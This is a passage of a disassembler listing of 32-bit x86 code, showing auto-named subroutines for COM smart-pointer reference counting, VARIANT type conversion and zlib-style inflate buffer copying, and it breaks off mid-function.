mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 8
call sub_422A1E
mov byte ptr [ebp+var_4], 1
mov ecx, [ebp+var_10]
add ecx, 203Ch
call sub_43164E
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_10]
add ecx, 2040h
call sub_43164E
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_4298B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429930 proc near ; CODE XREF: sub_42852F+39�p
; sub_42852F+7D�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_429930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429950 proc near ; CODE XREF: sub_42852F+887�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [eax], edx
mov ecx, [ebp+var_4]
call sub_429A60
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_429950 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429980 proc near ; CODE XREF: sub_42852F+7E2�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_429980
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
mov [ebp+var_18], ecx
mov ecx, [ebp+var_18]
call sub_42414A
push 0Ch
call sub_431624
add esp, 4
mov [ebp+var_14], eax
mov [ebp+var_4], 0
cmp [ebp+var_14], 0
jz short loc_4299D1
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_14]
call sub_424188
mov [ebp+var_1C], eax
jmp short loc_4299D8
; ---------------------------------------------------------------------------
loc_4299D1: ; CODE XREF: sub_429980+3E�j
mov [ebp+var_1C], 0
loc_4299D8: ; CODE XREF: sub_429980+4F�j
mov ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
mov [ebp+var_4], 0FFFFFFFFh
mov edx, [ebp+var_18]
mov eax, [ebp+var_10]
mov [edx], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_429980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A00 proc near ; CODE XREF: sub_42852F+7FF�p
; sub_42852F+A61�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_429A20
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_429AA0
mov [ebp+var_8], eax
jmp short loc_429A27
; ---------------------------------------------------------------------------
loc_429A20: ; CODE XREF: sub_429A00+F�j
mov [ebp+var_8], 0
loc_429A27: ; CODE XREF: sub_429A00+1E�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_429A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A30 proc near ; CODE XREF: sub_42852F+7F2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_429A50
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_429AB0
mov [ebp+var_8], eax
jmp short loc_429A57
; ---------------------------------------------------------------------------
loc_429A50: ; CODE XREF: sub_429A30+F�j
mov [ebp+var_8], 0
loc_429A57: ; CODE XREF: sub_429A30+1E�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_429A30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A60 proc near ; CODE XREF: sub_429950+14�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_429A79
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_429A80
loc_429A79: ; CODE XREF: sub_429A60+D�j
mov esp, ebp
pop ebp
retn
sub_429A60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A80 proc near ; CODE XREF: sub_429A60+14�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
add eax, 8
push eax
call dword_4330AC ; InterlockedIncrement
mov ecx, [ebp+var_4]
mov eax, [ecx+8]
mov esp, ebp
pop ebp
retn
sub_429A80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AA0 proc near ; CODE XREF: sub_429A00+16�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax]
mov esp, ebp
pop ebp
retn
sub_429AA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AB0 proc near ; CODE XREF: sub_429A30+16�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_429AD2
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
call dword_433278
mov [ebp+var_8], eax
jmp short loc_429AD9
; ---------------------------------------------------------------------------
loc_429AD2: ; CODE XREF: sub_429AB0+F�j
mov [ebp+var_8], 0
loc_429AD9: ; CODE XREF: sub_429AB0+20�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_429AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AE0 proc near ; CODE XREF: sub_42852F+871�p
; sub_429B00+3C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
push eax
call dword_433268
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_429AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429B00 proc near ; CODE XREF: sub_42852F+8DA�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_14 = word ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_429B00
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
mov [ebp+var_24], ecx
mov eax, [ebp+var_24]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 0Bh
jnz short loc_429B39
mov edx, [ebp+var_24]
movsx eax, word ptr [edx+8]
test eax, eax
setnz al
jmp short loc_429B74
; ---------------------------------------------------------------------------
loc_429B39: ; CODE XREF: sub_429B00+29�j
lea ecx, [ebp+var_1C]
call sub_429AE0
mov [ebp+var_4], 0
mov ecx, [ebp+var_24]
push ecx
push 0Bh
lea ecx, [ebp+var_1C]
call sub_429C40
movsx edx, [ebp+var_14]
test edx, edx
setnz al
mov [ebp+var_20], al
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_429CA0
mov al, [ebp+var_20]
loc_429B74: ; CODE XREF: sub_429B00+37�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_429B00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429B90 proc near ; CODE XREF: sub_42852F+8CA�p
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 2
jnz short loc_429BB1
mov edx, [ebp+var_4]
mov ax, [ebp+arg_0]
mov [edx+8], ax
jmp short loc_429BEA
; ---------------------------------------------------------------------------
loc_429BB1: ; CODE XREF: sub_429B90+12�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
cmp edx, 0Bh
jnz short loc_429BCF
movsx eax, [ebp+arg_0]
neg eax
sbb eax, eax
mov ecx, [ebp+var_4]
mov [ecx+8], ax
jmp short loc_429BEA
; ---------------------------------------------------------------------------
loc_429BCF: ; CODE XREF: sub_429B90+2C�j
mov ecx, [ebp+var_4]
call sub_429C00
mov edx, [ebp+var_4]
mov word ptr [edx], 2
mov eax, [ebp+var_4]
mov cx, [ebp+arg_0]
mov [eax+8], cx
loc_429BEA: ; CODE XREF: sub_429B90+1F�j
; sub_429B90+3D�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_429B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429C00 proc near ; CODE XREF: sub_429B90+42�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
push eax
call dword_433264
push eax
call sub_429C20
add esp, 4
mov esp, ebp
pop ebp
retn
sub_429C00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429C20 proc near ; CODE XREF: sub_429C00+12�p
; sub_429C40+46�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jge short loc_429C32
mov eax, [ebp+arg_0]
push eax
call sub_431952
loc_429C32: ; CODE XREF: sub_429C20+7�j
pop ebp
retn
sub_429C20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429C40 proc near ; CODE XREF: sub_429B00+51�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
cmp [ebp+arg_4], 0
jnz short loc_429C53
mov eax, [ebp+var_4]
mov [ebp+arg_4], eax
loc_429C53: ; CODE XREF: sub_429C40+B�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_4]
jnz short loc_429C70
mov edx, [ebp+arg_0]
and edx, 0FFFFh
mov eax, [ebp+var_4]
xor ecx, ecx
mov cx, [eax]
cmp edx, ecx
jz short loc_429C8E
loc_429C70: ; CODE XREF: sub_429C40+19�j
mov dx, word ptr [ebp+arg_0]
push edx
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_433260
push eax
call sub_429C20
add esp, 4
loc_429C8E: ; CODE XREF: sub_429C40+2E�j
mov esp, ebp
pop ebp
retn 8
sub_429C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429CA0 proc near ; CODE XREF: sub_42852F+A7E�p
; sub_42852F+AF9�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
push eax
call dword_433264
push eax
call sub_429C20
add esp, 4
mov esp, ebp
pop ebp
retn
sub_429CA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429CC0 proc near ; CODE XREF: sub_42852F+901�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+0B4h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_429CFE
push offset dword_4375F0
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_431960
loc_429CFE: ; CODE XREF: sub_429CC0+2A�j
push 0
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
call sub_429E50
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_429CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429D20 proc near ; CODE XREF: sub_42852F+8B3�p
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_429D20
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
mov [ebp+var_1C], ecx
mov [ebp+var_4], 0
lea eax, [ebp+var_14]
push eax
lea ecx, [ebp+arg_0]
call sub_429A00
push eax
mov ecx, [ebp+var_1C]
mov edx, [ecx]
mov eax, [ebp+var_1C]
push eax
call dword ptr [edx+104h]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jge short loc_429D7C
push offset dword_4375F0
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_10]
push edx
call sub_431960
loc_429D7C: ; CODE XREF: sub_429D20+48�j
mov ax, [ebp+var_14]
mov [ebp+var_18], ax
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_42414A
mov ax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_429D20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DB0 proc near ; CODE XREF: sub_42852F+E7�p
; sub_42852F+6FB�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_429EA0
mov esp, ebp
pop ebp
retn
sub_429DB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DD0 proc near ; CODE XREF: sub_42852F+B0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_429EA0
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_429DD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DF0 proc near ; CODE XREF: sub_42852F+8A8�p
; sub_42852F+8FA�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_429E09
push 80004003h
call sub_431952
loc_429E09: ; CODE XREF: sub_429DF0+D�j
mov ecx, [ebp+var_4]
mov eax, [ecx]
mov esp, ebp
pop ebp
retn
sub_429DF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429E20 proc near ; CODE XREF: sub_42852F+933�p
; sub_42852F+A0F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [eax], edx
mov ecx, [ebp+var_4]
call sub_429F20
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_429E20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429E50 proc near ; CODE XREF: sub_429CC0+47�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_429E74
mov ecx, [ebp+var_4]
call sub_429F20
loc_429E74: ; CODE XREF: sub_429E50+1A�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_429E50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429E80 proc near ; CODE XREF: sub_42852F+916�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, [ebp+var_4]
call sub_429ED0
mov esp, ebp
pop ebp
retn 4
sub_429E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429EA0 proc near ; CODE XREF: sub_429DB0+A�p
; sub_429DD0+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_429EBF
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
mov eax, [ecx]
push edx
call dword ptr [eax+8]
loc_429EBF: ; CODE XREF: sub_429EA0+D�j
mov esp, ebp
pop ebp
retn
sub_429EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429ED0 proc near ; CODE XREF: sub_429E80+10�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jz short loc_429F0D
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_8]
call sub_429F20
cmp [ebp+var_4], 0
jz short loc_429F0D
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
push edx
call dword ptr [ecx+8]
loc_429F0D: ; CODE XREF: sub_429ED0+11�j
; sub_429ED0+2F�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_429ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429F20 proc near ; CODE XREF: sub_429E20+14�p
; sub_429E50+1F�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_429F3F
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
mov eax, [ecx]
push edx
call dword ptr [eax+4]
loc_429F3F: ; CODE XREF: sub_429F20+D�j
mov esp, ebp
pop ebp
retn
sub_429F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429F50 proc near ; CODE XREF: sub_42A17E+220�p
; sub_42A17E+39E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
mov ecx, [eax+0Ch]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+34h]
ja short loc_429F7E
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
mov [ebp+var_10], ecx
jmp short loc_429F87
; ---------------------------------------------------------------------------
loc_429F7E: ; CODE XREF: sub_429F50+21�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
mov [ebp+var_10], eax
loc_429F87: ; CODE XREF: sub_429F50+2C�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+var_8]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_C]
cmp eax, [edx+10h]
jbe short loc_429FA4
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
mov [ebp+var_C], edx
loc_429FA4: ; CODE XREF: sub_429F50+49�j
cmp [ebp+var_C], 0
jz short loc_429FB7
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_429FB7
mov [ebp+arg_8], 0
loc_429FB7: ; CODE XREF: sub_429F50+58�j
; sub_429F50+5E�j
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
sub ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
mov [edx+10h], ecx
mov eax, [ebp+arg_4]
mov ecx, [eax+14h]
add ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
mov [edx+14h], ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+38h], 0
jz short loc_42A008
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+38h]
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov [ecx+3Ch], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
mov [edx+30h], ecx
loc_42A008: ; CODE XREF: sub_429F50+8C�j
cmp [ebp+var_C], 0
jz short loc_42A034
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_431764 ; memcpy
add esp, 0Ch
mov edx, [ebp+var_4]
add edx, [ebp+var_C]
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
loc_42A034: ; CODE XREF: sub_429F50+BC�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz loc_42A110
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [edx+34h]
cmp ecx, [eax+2Ch]
jnz short loc_42A066
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [edx+34h], ecx
loc_42A066: ; CODE XREF: sub_429F50+108�j
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
sub eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_C]
cmp edx, [ecx+10h]
jbe short loc_42A086
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov [ebp+var_C], ecx
loc_42A086: ; CODE XREF: sub_429F50+12B�j
cmp [ebp+var_C], 0
jz short loc_42A099
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_42A099
mov [ebp+arg_8], 0
loc_42A099: ; CODE XREF: sub_429F50+13A�j
; sub_429F50+140�j
mov edx, [ebp+arg_4]
mov eax, [edx+10h]
sub eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [ecx+10h], eax
mov edx, [ebp+arg_4]
mov eax, [edx+14h]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [ecx+14h], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+38h], 0
jz short loc_42A0EA
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+3Ch]
push eax
mov ecx, [ebp+arg_0]
call dword ptr [ecx+38h]
add esp, 0Ch
mov edx, [ebp+arg_0]
mov [edx+3Ch], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx+3Ch]
mov [eax+30h], edx
loc_42A0EA: ; CODE XREF: sub_429F50+16E�j
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_431764 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
add eax, [ebp+var_C]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_C]
mov [ebp+var_8], ecx
loc_42A110: ; CODE XREF: sub_429F50+ED�j
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx+0Ch], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+30h], edx
mov eax, [ebp+arg_8]
mov esp, ebp
pop ebp
retn
sub_429F50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A129 proc near ; CODE XREF: sub_42B09D+1C4�p
; sub_42B09D+FAD�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push 1Ch
push 1
mov eax, [ebp+arg_10]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_10]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_42A177
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dl, [ebp+arg_0]
mov [ecx+10h], dl
mov eax, [ebp+var_4]
mov cl, [ebp+arg_4]
mov [eax+11h], cl
mov edx, [ebp+var_4]
mov eax, [ebp+arg_8]
mov [edx+14h], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_C]
mov [ecx+18h], edx
loc_42A177: ; CODE XREF: sub_42A129+1F�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42A129 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A17E proc near ; CODE XREF: sub_42B09D+1080�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_4]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_42A1D5
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_30], eax
jmp short loc_42A1E1
; ---------------------------------------------------------------------------
loc_42A1D5: ; CODE XREF: sub_42A17E+44�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_30], edx
loc_42A1E1: ; CODE XREF: sub_42A17E+55�j
mov eax, [ebp+var_30]
mov [ebp+var_28], eax
loc_42A1E7: ; CODE XREF: sub_42A17E:loc_42AEA4�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov [ebp+var_34], edx
cmp [ebp+var_34], 9
ja loc_42AE45
mov eax, [ebp+var_34]
jmp off_42AEAD[eax*4]
loc_42A203: ; DATA XREF: HLXc:off_42AEAD�o
cmp [ebp+var_28], 102h
jb loc_42A309
cmp [ebp+var_2C], 0Ah
jb loc_42A309
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax+18h]
push ecx
mov edx, [ebp+var_10]
mov eax, [edx+14h]
push eax
